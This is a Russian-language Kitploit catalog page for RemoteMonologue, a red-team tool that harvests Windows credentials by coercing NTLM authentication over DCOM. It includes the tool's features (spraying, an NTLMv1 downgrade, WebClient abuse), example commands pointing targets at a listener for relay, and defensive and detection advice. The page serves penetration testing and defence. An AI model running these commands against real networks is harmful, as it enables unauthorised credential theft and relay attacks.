Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
RemoteMonologue — Вооружение DCOM для принуждения к NTLM-аутентификации | Kitploit
Инструменты/GitHubGitHub/xforcered/remotemonologue
Атаки на ПаролиЭксплуатацияЛатеральное перемещениеСбор информацииТестирование на ПроникновениеRed Teaming
GitHubxforcered/remotemonologue

RemoteMonologue

Вооружение DCOM для принуждения к NTLM-аутентификации

Репозиторий
2752261 год назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

RemoteMonologue

RemoteMonologue — это техника сбора учётных данных Windows, которая позволяет удалённо скомпрометировать пользователя, используя раздел реестра Interactive User RunAs и принудительные NTLM-аутентификации через DCOM.

Подробную информацию читайте в статье X-Force Red RemoteMonologue: применение DCOM для принудительных NTLM-аутентификаций.

Возможности

🔹 Принудительная аутентификация через DCOM (-dcom)

  • Нацелена на четыре объекта DCOM (ServerDataCollectorSet, FileSystemImage, MSTSWebProxy, UpdateSession) для запуска NTLM-аутентификации против указанного слушателя (-auth-to).

🔹 Перебор учётных данных (-spray)

  • Проверяет учётные данные в нескольких системах, а также захватывает учётные данные пользователей.

🔹 Атака с понижением до NetNTLMv1 (-downgrade)

  • Принуждает цели использовать NTLMv1, что упрощает взлом и ретрансляцию учётных данных.

🔹 Злоупотребление службой WebClient (-webclient)

  • Включает службу WebClient для облегчения принудительной HTTP-аутентификации.

🔹 Перечисление пользователей (-query)

  • Определяет пользователей с активным сеансом на целевой системе.

Примечание: Требуются права локального администратора на целевой системе.

Установка

root@kitploit:~
pip install impacket

Примеры

Ниже приведён пример запуска RemoteMonologue с атакой понижения до NetNTLMv1 с использованием Responder в качестве слушателя. По умолчанию, если параметр DCOM не указан, инструмент использует объект DCOM ServerDataCollectorSet.

root@kitploit:~
RemoteMonologue.py domain/user:password@target -auth-to [listener IP] -downgrade

image

Ниже ещё один пример: на этот раз атака выполняется с использованием объекта DCOM FileSystemImage и включением службы WebClient для получения HTTP-аутентификации, которая затем ретранслируется в LDAP с помощью ntlmrelayx.

root@kitploit:~
RemoteMonologue.py domain/user:password@target -auth-to [listener NETBIOS@PORT] -webclient -dcom FileSystemImage

image

Рекомендации по защите

Для защиты от этих техник и их обнаружения можно внедрить несколько профилактических и детектирующих мер.

Профилактические меры:

  1. Включите подпись LDAP и привязку канала: настройте принудительное подписание LDAP и привязку канала на контроллерах домена для защиты конечной точки LDAP от атак с ретрансляцией. Примечание: начиная с Windows Server 2025 эти параметры будут применяться по умолчанию.

  2. Переходите на последние версии Windows: обновите серверы до Windows Server 2025, а рабочие станции — до Windows 11 версии 24H2, чтобы снизить риск атак понижения до NetNTLM, поскольку NTLMv1 удалён в этих версиях.

  3. Принудительно включайте подпись SMB: включите и применяйте подпись SMB на серверах Windows для предотвращения атак ретрансляции SMB.

  4. Внедряйте надёжные политики паролей: применяйте требования к надёжным паролям, чтобы усложнить атаки по взлому паролей.

Возможности обнаружения:

  1. Отслеживайте удалённый доступ к объектам DCOM: регистрируйте доступ к затронутым объектам DCOM и их конкретным свойствам и методам для выявления подозрительной активности.

  2. Отслеживайте изменения в реестре: контролируйте изменения разделов реестра RunAs и LmCompatibilityLevel.

  3. Следите за активностью службы WebClient: отслеживайте случаи удалённого включения службы WebClient, поскольку она используется для облегчения HTTP-аутентификации NTLM.

Скачать инструмент